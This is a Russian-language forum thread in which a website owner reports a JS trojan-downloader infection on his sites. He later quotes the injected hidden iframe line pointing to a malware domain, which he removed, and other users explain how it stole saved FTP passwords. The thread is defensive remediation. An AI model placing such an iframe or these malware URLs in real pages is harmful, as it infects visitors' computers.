Trojan-Downloader.JS.Tabletka.a

[Paradox]

Привет!
Знаю правила форума, но вирус не у меня на компе, а на сайте bonus-poker.ru - без касперского НЕ ЗАХОДИТЬ!!!. Каспер определил его как Trojan-Downloader.JS.Tabletka.a - пытается закачать файлы с разных серверов. Вирус совсем молодой, был зафиксирован лабораторией касперского 22-го октября кажется, еще нет ни описаний ничего. Отправил им письмо, пока разбираются.

В моем случае троян пытается качаться с сервера 0012.ff-freehosting.com/all/index.php//index

Также заразился другой сайт, который находится у этого же хостера.

Вот тут единственное, что нашел по этому поводу http://forum.kazandom.ru/index.php?s...0&#entry471414

В конце кода страницы был подозрительный чужлй php-код на открытие страницы, но такой страницы у себя на хосте я не нашел. Удаление кода также не решило проблему. Ваша лаборатория может справится с такой зверюшкой до официальных релизов?

[Гриша]

Спасибо за информацию, но увы свой лаборатории у нас нет

[Paradox]

Решил проблему сам. В коде главных страниц обоих сайтов на этом хостере была найдена и удалена следующая строчка кода:

<iframe src="http://thefilmmusic.cn/in" width=393 height=14 style="visibility: hidden"></iframe>

Сменил пароли в панель и фтп-вход. После этого касперский перестал обнаруживать вирус.

[drongo]

Paradox, тему я перенёс. Больше в "помогите" такое не постить, иначе красную карточку подарю.

[Virtual]

Paradox, история стара как мир, данный скрипт пытается качать кучу разных эксплойтов, большинство из них заточены на хищение сохраненных паролей из разного рода файл и фтп менеджеров. так что проверять внимательно все компы с которых заходили в админку сайта. т.к. утечка произошла с них. и не факт что это не повторится.
ЗЫ перестанте сохранять пароли в менеджерах, скуолько можно уже...